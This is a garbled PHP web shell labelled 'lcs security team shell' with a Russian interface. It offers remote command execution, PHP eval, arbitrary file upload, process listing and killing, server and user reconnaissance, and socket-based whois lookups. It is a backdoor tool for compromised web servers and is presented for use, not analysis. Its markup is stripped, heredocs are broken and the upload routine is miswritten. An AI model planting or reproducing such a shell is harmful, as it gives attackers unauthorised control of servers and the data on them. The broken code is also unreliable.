~~~lcs security team shell~~~





"; if (!empty($_GET['ac'])) {$ac = $_GET['ac'];} elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];} else {$ac = "shell";} // Menu echo "
|Выполнить команду| |Выполнить PHP| |Файловый менеджер| |Process list| |Info| |Tools| |Whois| 


";
switch($ac) {
// Shell
case "shell":
echo <<[ Выполнить команду ]
$tend";
break;
//PHP Eval Code execution
case "eval":
echo <<[ Выполнить PHP ]






$$sern 







$tend
HTML;
if (isset($_POST['ephp'])){
trim($_POST['ephp']);
}
break;
//Text tools
case "tools":
echo <<[ Tools ]













$tend
HTML;
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
switch($_POST['tac']) {
case "1":
echo "Раскодированный текст:" .base64_decode($_POST['tot']). "";
break;
case "2":
echo "Кодированный текст:" .base64_encode($_POST['tot']). "";
break;
case "3":
echo "Кодированный текст:" .md5($_POST['tot']). "";
break;
}}
break;
// Uploading
case "upload":
echo <<[ Закачать файл ]






B64 Decode

B64 Encode

md5 Hash






 



$tend
HTML;

if(isset($_POST['path'])){$uploadfile=$_POST['path'].$_FILES['file']['name'];if($_POST['path']==""){$uploadfile=$_FILES['file']['name'];}if(array($_FILES['file']['tmp_name'],$uploadfile)){echo "Файл успешно загружен в папку$uploadfile\n";echo "Имя:".$_FILES['file']['name']."\n";echo "Размер:".$_FILES['file']['size']."\n";} else {
    print "Не удаётся загрузить файл. Инфа:\n";
    print_r($_FILES);
}
}


break;
//Process
case "proc";
echo "[ Процессы в системе ]
";

  echo "
";
  if ($pid)
  {
   if (!$sig) {$sig = 9;}
   echo "Отправление команды ".$sig." to #".$pid."... ";
   $ret = posix_kill($pid,$sig);
   if ($ret) {echo "Процесс убит !";}
   else {echo "ОШИБКА! ".htmlspecialchars($sig).", в процессе #".htmlspecialchars($pid).".";}
  }
  $ret = `ps -aux`;
  if (!$ret) {echo "Невозможно отобразить список процессов!";}
  else
  {
   $ret = htmlspecialchars($ret);
   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
   $stack = explode("\n",$ret);
   $head = explode(" ",$stack[0]);
   unset($stack[0]);
   if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
   if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
   $k = $ps_aux_sort[0];

   $prcs = array();
   foreach ($stack as $line)
   {
    if (!empty($line))
    {
     echo "";
     $line = explode(" ",$line);
     $line[10] = join(" ",array_slice($line,10,count($line)));
     $line = array_slice($line,0,11);
     $prcs[] = $line;
     echo "";
    }
   }
   $head[$k] = "".$head[$k]."".$y;
   $v = $ps_aux_sort[0];
   if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
   $tab = array();
   $tab[] = $head;
   $tab = array_merge($tab,$prcs);
   echo "





Файл:





Папка:

";
   foreach($tab as $k)
   {
    echo "";
    foreach($k as $v) {echo "";}
    echo "";
   }
   echo "
".$v."
";
  }
break;
   //info
case "info":

echo <<< HTML
[ Общая информация о сервере ]



HTML;
$os=php_uname();
$p=phpversion();
$u=get_current_user();
$ud=getmyuid();
$gid=getmygid ();
$srvs=getenv('SERVER_SOFTWARE');
$rm=getenv('REQUEST_METHOD');
$sip=getenv('SERVER_ADDR');
$yip=getenv('REMOTE_ADDR');
$f=getenv('HTTP_X_FORWARDED_FOR');
print("OS - $os
");
print("Версия PHP - $p
");
print("User - $u 
");
print("User ID - $ud 
");
print("Group ID - $gid
");
print("Server Software - $srvs 
");
print("Request Method - $rm
");
print("Server IP - $sip
");
print("Your IP - $yip
");
print("X Forwarded For IP - $f
");

break;

// Whois
case "whois":
echo <<[ Whois ]

$tend
HTML;
if (isset($_POST['wq']) && $_POST['wq']<>"") {
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
$querty = $_POST['wq']."\r\n";
$fp = fsockopen($wser, 43);
if (!$fp) {echo "Не могу открыть сокет";} else {
fputs($fp, $querty);
while(!feof($fp)){echo fgets($fp, 4000);}
fclose($fp);
}}
break;
}
?>






Домен:





Cервер: